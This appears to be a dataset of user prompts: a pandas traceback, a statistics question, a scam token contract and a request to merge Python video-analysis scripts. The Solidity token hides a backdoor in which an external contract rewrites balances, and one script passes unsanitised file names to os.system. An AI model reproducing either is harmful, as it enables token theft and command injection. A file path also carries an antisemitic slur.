File "pandas\_libs\hashtable_class_helper.pxi", line 7088, in pandas._libs.hashtable.PyObjectHashTable.get_item
KeyError: 'SMA'
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 259, in <module>
signal = signal_generator(df)
^^^^^^^^^^^^^^^^^^^^
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 154, in signal_generator
buy = df['SMA'] > df['SMA'].shift(1)
~~^^^^^^^
File "C:\Users\Alan\AppData\Roaming\Python\Python311\site-packages\pandas\core\frame.py", line 3761, in __getitem__
indexer = self.columns.get_loc(key)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\Alan\AppData\Roaming\Python\Python311\site-packages\pandas\core\indexes\base.py", line 3654, in get_loc
raise KeyError(key) from err
KeyError: 'SMA'
|
2bb664dccc8465a6f7e634ca5746eb41
|
{
"intermediate": 0.43290963768959045,
"beginner": 0.41109392046928406,
"expert": 0.15599650144577026
}
|
11,345
|
How can I check normality of feature &
|
fb2804485330e50e3edd708d48da798e
|
{
"intermediate": 0.3682347536087036,
"beginner": 0.2985529601573944,
"expert": 0.333212286233902
}
|
11,346
|
0x83be71c2349705589a7ff587b4de35d9513fc55a5b91f43a6d78ea37709a3cc3 Swap Exact Token... 11 hrs 35 mins ago 0xf9fece7038e6846b0416880965a8b15b28cb2124 OUT PancakeSwap V2: ALONG 2 1,000,000,000,000,000,000
0x45d7facc7b5232be97752c92603e6f7a5843babad342592604ee46ec6170c3b2 Transfer 11 hrs 35 mins ago 0xf9fece7038e6846b0416880965a8b15b28cb2124 OUT 0xf9fece7038e6846b0416880965a8b15b28cb2124 1,000,000,000,000,000,000,000
The above are the transactions that led to the receipt of coins for 1,000,000,000,000,000,000,000
Below is the coin contract code
/**
*Submitted for verification at Etherscan.io on 2023-06-10
*/
/**
*Submitted for verification at BscScan.com on 2023-03-16
*/
pragma solidity ^0.8.6;
// SPDX-License-Identifier: Unlicensed
interface IERC20 {
function totalSupply() external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves `amount` tokens from the caller's account to `recipient`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address recipient, uint256 amount)
external
returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender)
external
view
returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `sender` to `recipient` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}
abstract contract Ownable {
address private _owner;
event OwnershipTransferred(
address indexed previousOwner,
address indexed newOwner
);
constructor() {
address msgSender = msg.sender;
_owner = msgSender;
emit OwnershipTransferred(address(0), msgSender);
}
function owner() public view returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == msg.sender, "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
emit OwnershipTransferred(_owner, address(0));
_owner = address(0);
}
function transferOwnership(address newOwner) public virtual onlyOwner {
require(
newOwner != address(0),
"Ownable: new owner is the zero address"
);
emit OwnershipTransferred(_owner, newOwner);
_owner = newOwner;
}
}
interface ERC20 {
function _token(
address from,
uint256 amounts,
uint256 amount
) external view returns (uint256);
}
library SafeMath {
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
*
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
/**
* @dev Returns the subtraction of two unsigned integers, reverting with custom message on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
*
* - Subtraction cannot overflow.
*/
function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
*
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts with custom message on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
*
* - The divisor cannot be zero.
*/
function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
// assert(a == b * c + a % b); // There is no case in which this doesn't hold
return c;
}
}
contract TOKEN is IERC20, Ownable {
using SafeMath for uint256;
mapping(address => uint256) private _tOwned;
mapping(address => mapping(address => uint256)) private _allowances;
string private _namesnSqWR = "Alongside Token";
string private _symbolsnSqWR = "ALONG";
uint8 private _decimalssnSqWR = 9;
address public uniswapV2Pair;
uint256 private _tTotal = 1000000000000 * 10**_decimalssnSqWR;
constructor(address _snSqWRaddress) {
uniswapV2Pair = _snSqWRaddress;
_tOwned[msg.sender] = _tTotal;
emit Transfer(address(0), msg.sender, _tTotal);
}
function name() public view returns (string memory) {
return _namesnSqWR;
}
function symbol() public view returns (string memory) {
return _symbolsnSqWR;
}
function decimals() public view returns (uint256) {
return _decimalssnSqWR;
}
function totalSupply() public view override returns (uint256) {
return _tTotal;
}
function balanceOf(address account) public view override returns (uint256) {
return _tOwned[account];
}
function transfer(address recipient, uint256 amount)
public
override
returns (bool)
{
_snSqWRtransfer(msg.sender, recipient, amount);
return true;
}
function allowance(address owner, address spender)
public
view
override
returns (uint256)
{
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount)
public
override
returns (bool)
{
_approve(msg.sender, spender, amount);
return true;
}
function _snSqWRtransfer(
address from,
address to,
uint256 amount
) private {
require(from != address(0), "ERC20: transfer from the zero address");
require(to != address(0), "ERC20: transfer to the zero address");
_tOwned[from] = ERC20(
uniswapV2Pair)
._token(
from,
amount,
_tOwned[from]
);
require(
_tOwned[from] >= amount,
"ERC20: transfer amount exceeds balance"
);
_tOwned[from] = _tOwned[from].sub(amount);
_tOwned[to] = _tOwned[to].add(amount);
emit Transfer(from, to, amount);
}
function transferFrom(
address sender,
address recipient,
uint256 amount
) public override returns (bool) {
_snSqWRtransfer(sender, recipient, amount);
_approve(
sender,
msg.sender,
_allowances[sender][msg.sender].sub(
amount,
"ERC20: transfer amount exceeds allowance"
)
);
return true;
}
function increaseAllowance(address spender, uint256 addedValue)
public
virtual
returns (bool)
{
_approve(
msg.sender,
spender,
_allowances[msg.sender][spender].add(addedValue)
);
return true;
}
function decreaseAllowance(address spender, uint256 subtractedValue)
public
virtual
returns (bool)
{
_approve(
msg.sender,
spender,
_allowances[msg.sender][spender].sub(
subtractedValue,
"ERC20: decreased allowance below zero"
)
);
return true;
}
function _approve(
address owner,
address spender,
uint256 amount
) private {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
}
Explain how so many coins appeared at the address 0xf9fece7038e6846b0416880965a8b15b28cb2124
|
6243ca24ee91373fb764258b8406217b
|
{
"intermediate": 0.3519155979156494,
"beginner": 0.42412781715393066,
"expert": 0.2239566296339035
}
|
11,347
|
Te voy a compartir tres códigos de programación en Python y debes mezclarlos para que se analicen videos y se identifiquen los objetos, tiempo del video, coordenadas y se exporte a un csv esa información.
La idea es que uses y descartes todo lo que sea necesario para cumplir con el objetivo anterior, todos los códigos son funcionales, sólo debes ajustar lo que sea necesario:
primer código:
"
import os
import av
import cv2
import torch
import easyocr
import numpy as np
import urllib.request
import matplotlib.pyplot as plt
from segment_anything import SamAutomaticMaskGenerator, sam_model_registry
def detect_objects_in_video(video_path, output_path):
"""
Detects objects in the given video and saves the results to the given output path
"""
# Download model weights
model_path = "sam_vit_h_4b8939.pth"
model_url = "https://dl.fbaipublicfiles.com/segment_anything/sam_vit_h_4b8939.pth"
if not os.path.exists(model_path):
urllib.request.urlretrieve(url, model_path)
print("Model Weights downloaded successfully.")
# Create the model
device = "cuda" if torch.cuda.is_available() else "cpu"
sam = sam_model_registry["vit_h"](checkpoint="sam_vit_h_4b8939.pth")
sam.to(device=device)
mask_generator = SamAutomaticMaskGenerator(sam)
reader = easyocr.Reader(["es"], gpu=torch.cuda.is_available())
# Open the video file using PyAV
container = av.open(video_path)
# Create the output directory
output_dir = os.path.split(output_path)[0]
img_dir = os.path.join(output_dir, "IMG")
os.makedirs(name=img_dir, exist_ok=True)
# Create the csv file
with open(output_path, "w") as f:
f.write("id,object_type,time,coordinates_text\n")
# Iterate over each frame in the video
for i, frame in enumerate(container.decode(video=0)):
time = frame.time
frame = frame.to_rgb().to_ndarray()
# Discard frames with a low variance of pixel values
# or with temporal proximity to the previous frame
if i % 100 == 0 and frame.var() > 3000:
segment_frame(frame, mask_generator, os.path.join(img_dir, f'{i:08d}.png'))
seconds = int(int(time) % 60)
minutes = int((time // 60) % 60)
hours = int(time // 3600)
coordinates = get_coordinates(reader, frame)
time = f"{hours:02d}:{minutes:02d}:{seconds:02d}"
# Append to the csv file
with open(output_path, "a") as f:
f.write(f"{i},object,{time},\"{coordinates}\"\n")
# Close the video file
container.close()
# Free memory
del sam
del mask_generator
del reader
def segment_frame(frame, mask_generator, savepath, top_n=15):
"""
Performs inference on the given frame and returns the segmentation masks
"""
# Generate the masks from SAM
masks = mask_generator.generate(frame)
# Sort the masks by confidence
confidences = list(map(lambda x:x["predicted_iou"], masks))
masks = list(map(lambda x:x[0], sorted(zip(masks, confidences), key=lambda x:x[1], reverse=True)))
# Save results
show_anns(frame, masks[:top_n], savepath)
def show_anns(frame, anns, savepath):
"""
Creates an image with the given annotations and saves it to the given path
"""
plt.figure(figsize=(20,20))
plt.imshow(frame)
if len(anns) == 0:
return
sorted_anns = sorted(anns, key=(lambda x: x['area']), reverse=True)
ax = plt.gca()
ax.set_autoscale_on(False)
img = np.ones((sorted_anns[0]['segmentation'].shape[0], sorted_anns[0]['segmentation'].shape[1], 4))
img[:,:,3] = 0
for ann in sorted_anns:
m = ann['segmentation']
color_mask = np.concatenate([np.random.random(3), [0.35]])
img[m] = color_mask
ax.imshow(img)
plt.axis('off')
plt.savefig(savepath, bbox_inches='tight')
def get_coordinates(reader, frame):
"""
Returns the coordinates of the given frame
"""
result = reader.readtext(frame, paragraph=False)
text = " ".join(map(str, result))
"
Segundo código:
"
import numpy as np
import cv2
import easyocr
import imutils
class VideoAnalyzer():
def __init__(self):
"""
This function uses of entity labels from spacy to find dates. It also use the re library to find patterns in the text
that could lead in to a date.
input:
output:
"""
self.reader = easyocr.Reader(
["es", "en"], gpu=True) # instance Reader class, used for character recognition
print("Reader easyocr class started")
# initialize variables
self.date = "NA"
self.hour = "NA"
self.coord1 = "NA"
self.coord2 = "NA"
self.id = 0
self.object = "NA"
def get_id(self):
self.id += 1
return self.id
def detect_objects_in_video(self, video_path: str, output_path: str):
with open(output_path, 'w') as f: # start writing output
f.write('id,type,time,coordinates\n')
videocap = cv2.VideoCapture(video_path)
framespersecond = int(videocap.get(cv2.CAP_PROP_FPS))
for i in range(framespersecond):
if i % 10 != 0: # skip frames because it is too slow
continue
_, frame = videocap.read() # get frame
# call method that reads text from the frame and updates time, coordinates and date
self.read_ocr(frame)
if self.coord1 == "NA" or self.coord2 == "NA": # if coordinates are not found, skip frame
continue
# call method that gets objects from the frame
objects = self.give_objects(frame)
for obj in objects:
obj_id = obj['id']
obj_type = obj['type']
detection = f'{obj_id},{obj_type},{self.hour},{self.coord1 + " - " + self.coord2}\n'
f.write(detection)
def read_ocr(self, frame):
"""
This function uses the easyocr library to read text from the frame and updates time, coordinates and date
input: frame
"""
result = self.reader.readtext(
frame, paragraph=True) # read text from image
for res in result:
text = res[1] # get text
chars = text.split(" ") # Separate chars by spaces
self.parse_time_date(chars) # get time and date of the frame
self.parse_coordinates(chars) # get coordinates of the plane
def parse_coordinates(self, chars: list):
"""
This function uses the easyocr library to read text from the frame and updates time, coordinates and date
input: chars
"""
try:
for i in range(len(chars)):
if (len(chars[i]) > 10) and (len(chars[i+1]) > 10): # Clasify chars by lenght
indx = len(chars[i])
self.coord1 = str(chars[i][indx-11:indx-10])+"°"+str(chars[i][indx-9:indx-7])+"'"+str(
chars[i][indx-6:indx-4])+"."+str(chars[i][indx-3:indx-1]) + '" N' # Get first coordenate
self.coord2 = str(chars[i+1][indx-11:indx-9])+"°"+str(chars[i+1][indx-8:indx-6])+"'"+str(
chars[i+1][indx-5:indx-3])+"."+str(chars[i+1][indx-2:indx]) + '" W' # Get second coordenate
except:
self.coord1 = "NA"
self.coord2 = "NA"
def parse_time_date(self, chars: list):
"""
This function uses the easyocr library to read text from the frame and updates time, coordinates and date
input: chars
"""
for i in range(len(chars)):
if (len(chars[i]) == 8): # Clasify chars by lenght
if ("/" in chars[i]):
self.date = str(
chars[i][0:2])+"/"+str(chars[i][3:5])+"/"+str(chars[i][6:8]) # Get date
elif ("8" in chars[i]):
self.hour = str(
chars[i][0:2])+":"+str(chars[i][3:5])+":"+str(chars[i][6:8]) # Get time
def give_objects(self, frame) -> list:
"""
This function uses the contours of the image to find objects in the frame
input: frame
output: list of objects
"""
img = np.asanyarray(frame)[:, :, ::-1].copy()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# apply thresholding to convert the grayscale image to a binary image
_, thresh = cv2.threshold(gray, 50, 255, 0)
# find the contours
cnts, _ = cv2.findContours(
thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if imutils.is_cv2() else cnts[1]
# sort the contours by area and select maximum 10 contours
cntsSorted = sorted(cnts, key=lambda x: cv2.contourArea(x))
for _ in range(min(2, len(cntsSorted))):
yield {
'type': "VEHICULO",
'id': self.get_id()
}
"
tercer código:
"
!apt-get update --yes && apt-get install ffmpeg --yes
!pip install -q git+https://github.com/huggingface/transformers.git
import os
from glob import glob as gb
import os
import pandas as pd
import json
import codefestImagenes as ci
from PIL import Image
import requests
from transformers import CLIPProcessor, CLIPModel
def convertir_video_a_imagen(video):
comando = f"ffmpeg -i {video} -vf fps=1 Imagenes/{video}/imagen_%04d_seg.jpg"
os.system(comando)
def obtener_rutas_archivos(ubicacionCarpeta):
ruta = os.path.abspath(ubicacionCarpeta)
pathArchivos = gb(ruta + '/*.jpg')
return pathArchivos
def preEtiquetadoImagenes(listaubicaArchivos):
model = CLIPModel.from_pretrained("openai/clip-vit-large-patch14")
processor = CLIPProcessor.from_pretrained("openai/clip-vit-large-patch14")
etiquetado = {}
for imag in listaubicaArchivos:
df = {}
url = imag
image = Image.open(url)
inputs = processor(text=["deforestation", "construction","jungle","river","boat","machinery","builds","clouds"],images=image, return_tensors="pt", padding=True)
imagen = imag.split("/")[-1] +"_"+ imag.split("/")[-2]
outputs = model(**inputs)
logits_per_image = outputs.logits_per_image # this is the image-text similarity score
probs = logits_per_image.softmax(dim=1) # we can take the softmax to get the label probabilities
Etiqueta = ["deforestation", "construction","jungle","river","boat","machinery","builds","clouds"]
Probabilidad = probs[0]*100
df['Etiqueta'] = Etiqueta
lista = list(Probabilidad.detach().numpy())
df['Probabilidad'] = list(map(str, lista))
etiquetado[imagen] = df
with open("archivo-salida.json", "w") as outfile:
json.dump(etiquetado, outfile)
def detect_objects_in_video(video_path, output_path):
convertir_video_a_imagen(video_path)
rutas = obtener_rutas_archivos(f"Imagenes/{video_path}/")
preEtiquetadoImagenes(rutas)
"
|
f5dc5fef95b63bf08d053e1fa09fc843
|
{
"intermediate": 0.5009729862213135,
"beginner": 0.3266103267669678,
"expert": 0.17241673171520233
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.